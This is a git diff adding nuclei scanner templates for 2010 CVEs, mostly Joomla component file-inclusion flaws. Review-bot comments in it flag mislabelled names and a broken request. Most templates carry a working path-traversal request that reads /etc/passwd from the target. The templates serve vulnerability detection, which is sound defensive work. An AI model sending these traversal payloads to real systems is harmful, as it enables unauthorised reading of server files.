+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/cve-2010-0982.yaml b/nuclei-templates/CVE-2010/cve-2010-0982.yaml
new file mode 100644
index 0000000000..a69166498d
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0982.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-0982
+
+info:
+ name: Joomla! Component com_cartweberp - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/10942
+ - https://www.cvedetails.com/cve/CVE-2010-0982
+ - http://www.securityfocus.com/bid/37581
+ - http://secunia.com/advisories/37917
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-0982
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/cve-2010-0985.yaml b/nuclei-templates/CVE-2010/cve-2010-0985.yaml
new file mode 100644
index 0000000000..614705c1c5
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0985.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-0985
+
+info:
+ name: Joomla! Component com_abbrev - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/10948
+ - https://www.cvedetails.com/cve/CVE-2010-0985
+ - http://www.securityfocus.com/bid/37560
+ - http://osvdb.org/61458
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-0985
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1056.yaml b/nuclei-templates/CVE-2010/cve-2010-1056.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/CVE-2010-1056.yaml
rename to nuclei-templates/CVE-2010/cve-2010-1056.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1217.yaml b/nuclei-templates/CVE-2010/cve-2010-1217.yaml
new file mode 100644
index 0000000000..40edd4a34c
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1217.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1217
+
+info:
+ name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
+ reference:
+ - https://www.exploit-db.com/exploits/11814
+ - https://www.cvedetails.com/cve/CVE-2010-1217
+ - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
+ - http://www.securityfocus.com/bid/38866
+ remediation: Apply all relevant security patches and product upgrades.
+ classification:
+ cve-id: CVE-2010-1217
+ tags: cve,cve2010,joomla,lfi,plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/13
diff --git a/nuclei-templates/CVE-2010/cve-2010-1313.yaml b/nuclei-templates/CVE-2010/cve-2010-1313.yaml
new file mode 100644
index 0000000000..8025cded39
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1313.yaml
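Review bot: The `name:` in cve-2010-1217.yaml says JE Tooltip 1.0 while the request targets `option=com_jeformcr` and the description attributes the flaw to JE Form Creator, so a hit is likely to be triaged against the wrong component. Naming what the request actually tests avoids that, e.g. `name: Joomla! Component JE Form Creator (com_jeformcr) - Local File Inclusion`. The description also says the issue needs magic_quotes_gpc disabled; that precondition is worth repeating next to the request as a comment, `# only reachable when magic_quotes_gpc is disabled`, so a non-match is not read as a clean bill of health.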
@@ -0,0 +1,29 @@
+id: CVE-2010-1313
+
+info:
+ name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12082
+ - https://www.cvedetails.com/cve/CVE-2010-1313
+ - http://www.securityfocus.com/bid/39237
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1313
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1314.yaml b/nuclei-templates/CVE-2010/cve-2010-1314.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/CVE-2010-1314.yaml
rename to nuclei-templates/CVE-2010/cve-2010-1314.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1469.yaml b/nuclei-templates/CVE-2010/cve-2010-1469.yaml
new file mode 100644
index 0000000000..b8370e009c
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1469.yaml
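Review bot: The `name:` in cve-2010-1313.yaml spells the product "Saber Cart", but the description and the request both use Seber Cart (`com_sebercart`), so searches and reports keyed on the template name will not line up with the component that is actually installed. `name: Joomla! Component Seber Cart 1.0.0.12 - Local File Inclusion` matches the rest of the file. The description also lists 1.0.0.13 as affected, which the name leaves out.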
@@ -0,0 +1,30 @@
+id: CVE-2010-1469
+
+info:
+ name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12146
+ - https://www.cvedetails.com/cve/CVE-2010-1469
+ - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt
+ - http://www.exploit-db.com/exploits/12146
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1469
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/cve-2010-1470.yaml b/nuclei-templates/CVE-2010/cve-2010-1470.yaml
new file mode 100644
index 0000000000..bf37563f9b
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1470.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1470
+
+info:
+ name: Joomla! Component Web TV 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12166
+ - https://www.cvedetails.com/cve/CVE-2010-1470
+ - http://secunia.com/advisories/39405
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1470
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/cve-2010-1473.yaml b/nuclei-templates/CVE-2010/cve-2010-1473.yaml
new file mode 100644
index 0000000000..02b9972d70
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1473.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1473
+
+info:
+ name: Joomla! Component Advertising 0.25 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12171
+ - https://www.cvedetails.com/cve/CVE-2010-1473
+ - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
+ - http://secunia.com/advisories/39410
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1473
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/cve-2010-1475.yaml b/nuclei-templates/CVE-2010/cve-2010-1475.yaml
new file mode 100644
index 0000000000..bb3e999cac
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1475.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1475
+
+info:
+ name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12147
+ - https://www.cvedetails.com/cve/CVE-2010-1475
+ - http://secunia.com/advisories/39285
+ classification:
+ cve-id: CVE-2010-1475
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/24
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1495.yaml b/nuclei-templates/CVE-2010/cve-2010-1495.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/CVE-2010-1495.yaml
rename to nuclei-templates/CVE-2010/cve-2010-1495.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1531.yaml b/nuclei-templates/CVE-2010/cve-2010-1531.yaml
new file mode 100644
index 0000000000..d76282552f
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1531.yaml
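Review bot: The request path in cve-2010-1475.yaml has a doubled equals sign, `controller==../..`, so the value the server receives starts with `=` instead of the traversal sequence. Every sibling template in this commit uses a single `=`, so this looks like a typo that would make the check silently miss affected hosts. The path line should read `- "{{BaseURL}}/index.php?option=com_preventive&controller=../../../../../../../../../../etc/passwd%00"`. This template also has no `remediation` field, which most of its neighbours carry.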
@@ -0,0 +1,30 @@
+id: CVE-2010-1531
+
+info:
+ name: Joomla! Component redSHOP 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12054
+ - https://www.cvedetails.com/cve/CVE-2010-1531
+ - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt
+ - http://www.osvdb.org/63535
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1531
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/cve-2010-1532.yaml b/nuclei-templates/CVE-2010/cve-2010-1532.yaml
new file mode 100644
index 0000000000..5f2d0e4a18
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1532.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1532
+
+info:
+ name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12118
+ - https://www.cvedetails.com/cve/CVE-2010-1532
+ - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt
+ - http://www.securityfocus.com/bid/39348
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1532
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/cve-2010-1540.yaml b/nuclei-templates/CVE-2010/cve-2010-1540.yaml
new file mode 100644
index 0000000000..50d5e1c02d
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1540.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1540
+
+info:
+ name: Joomla! Component com_blog - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/11625
+ - https://www.cvedetails.com/cve/CVE-2010-1540
+ - http://secunia.com/advisories/38777
+ - http://www.securityfocus.com/bid/38530
+ classification:
+ cve-id: CVE-2010-1540
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/06
diff --git a/nuclei-templates/CVE-2010/cve-2010-1653.yaml b/nuclei-templates/CVE-2010/cve-2010-1653.yaml
new file mode 100644
index 0000000000..737487cfd0
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1653.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1653
+
+info:
+ name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12430
+ - https://www.cvedetails.com/cve/CVE-2010-1653
+ - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt
+ - http://www.securityfocus.com/bid/39743
+ classification:
+ cve-id: CVE-2010-1653
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/23
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1658.yaml b/nuclei-templates/CVE-2010/cve-2010-1658.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/CVE-2010-1658.yaml
rename to nuclei-templates/CVE-2010/cve-2010-1658.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-1714.yaml b/nuclei-templates/CVE-2010/cve-2010-1714.yaml
new file mode 100644
index 0000000000..1dacc59f33
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1714.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1714
+
+info:
+ name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12168
+ - https://www.cvedetails.com/cve/CVE-2010-1714
+ - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt
+ - http://secunia.com/advisories/39413
+ classification:
+ cve-id: CVE-2010-1714
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/28
diff --git a/nuclei-templates/CVE-2010/cve-2010-1715.yaml b/nuclei-templates/CVE-2010/cve-2010-1715.yaml
new file mode 100644
index 0000000000..a97738faf3
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1715.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1715
+
+info:
+ name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12174
+ - https://www.cvedetails.com/cve/CVE-2010-1715
+ - http://www.osvdb.org/63659
+ - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt
+ classification:
+ cve-id: CVE-2010-1715
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/10
diff --git a/nuclei-templates/CVE-2010/cve-2010-1718.yaml b/nuclei-templates/CVE-2010/cve-2010-1718.yaml
new file mode 100644
index 0000000000..330a7e33cf
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1718.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1718
+
+info:
+ name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12282
+ - https://www.cvedetails.com/cve/CVE-2010-1718
+ - http://secunia.com/advisories/39521
+ - http://www.securityfocus.com/bid/39545
+ classification:
+ cve-id: CVE-2010-1718
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/01
diff --git a/nuclei-templates/CVE-2010/cve-2010-1871.yaml b/nuclei-templates/CVE-2010/cve-2010-1871.yaml
new file mode 100644
index 0000000000..8f02fc1dd0
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1871.yaml
@@ -0,0 +1,24 @@
+id: CVE-2010-1871
+
+info:
+ name: JBoss Seam 2 Code Execution
+ author: medbsq
+ severity: high
+# - https://www.cvebase.com/cve/2010/1871
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}:8080/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://jz:zie"
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "java.lang."
+ - "For input string: \"zie\""
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1954.yaml b/nuclei-templates/CVE-2010/cve-2010-1954.yaml
new file mode 100644
index 0000000000..67e4710e8c
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1954.yaml
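Review bot: The request in cve-2010-1871.yaml does not appear to test the issue the template is named for. The id and name say JBoss Seam 2 code execution, but the path is `/scm/SubversionReleaseSCM/svnRemoteLocationCheck`, which looks like an endpoint of a different product, and the matchers only look for what seems to be a Java parse error echoing `zie`, so a hit would be filed under the wrong CVE and at the wrong severity. Appending `:8080` to `{{BaseURL}}` also yields a malformed URL for any target whose base already carries a port or path. The `info` block has no description, and its only reference sits in a top-level comment; either replace the request with a check that matches the advisory or re-id the template after what it really detects and add `description` and `reference` fields.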
@@ -0,0 +1,30 @@
+id: CVE-2010-1954
+
+info:
+ name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12287
+ - https://www.cvedetails.com/cve/CVE-2010-1954
+ - http://www.securityfocus.com/bid/39552
+ - http://www.exploit-db.com/exploits/12287
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1954
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/cve-2010-1957.yaml b/nuclei-templates/CVE-2010/cve-2010-1957.yaml
new file mode 100644
index 0000000000..fee775cfe3
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1957.yaml
@@ -0,0 +1,33 @@
+id: CVE-2010-1957
+
+info:
+ name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12235
+ - https://www.cvedetails.com/cve/CVE-2010-1957
+ - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1957
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/16
diff --git a/nuclei-templates/CVE-2010/cve-2010-1979.yaml b/nuclei-templates/CVE-2010/cve-2010-1979.yaml
new file mode 100644
index 0000000000..3b1f768585
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1979.yaml
@@ -0,0 +1,33 @@
+id: CVE-2010-1979
+
+info:
+ name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12088
+ - https://www.cvedetails.com/cve/CVE-2010-1979
+ - http://secunia.com/advisories/39360
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1979
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/cve-2010-2035.yaml b/nuclei-templates/CVE-2010/cve-2010-2035.yaml
new file mode 100644
index 0000000000..25cefc0e1a
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-2035.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-2035
+
+info:
+ name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/34006
+ - https://www.cvedetails.com/cve/CVE-2010-2035
+ - http://www.securityfocus.com/bid/40244
+ - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2035
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2045.yaml b/nuclei-templates/CVE-2010/cve-2010-2045.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/CVE-2010-2045.yaml
rename to nuclei-templates/CVE-2010/cve-2010-2045.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-2259.yaml b/nuclei-templates/CVE-2010/cve-2010-2259.yaml
new file mode 100644
index 0000000000..0d1cebd3bb
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-2259.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-2259
+
+info:
+ name: Joomla! Component com_bfsurvey - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/10946
+ - https://www.cvedetails.com/cve/CVE-2010-2259
+ - http://secunia.com/advisories/37866
+ - http://www.exploit-db.com/exploits/10946
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2259
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/cve-2010-2920.yaml b/nuclei-templates/CVE-2010/cve-2010-2920.yaml
new file mode 100644
index 0000000000..67f0851855
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-2920.yaml
@@ -0,0 +1,33 @@
+id: CVE-2010-2920
+
+info:
+ name: Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Foobla Suggestions (com_foobla_suggestions) component 1.5.1.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12120
+ - https://www.cvedetails.com/cve/CVE-2010-2920
+ - http://www.vupen.com/english/advisories/2010/1844
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2920
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
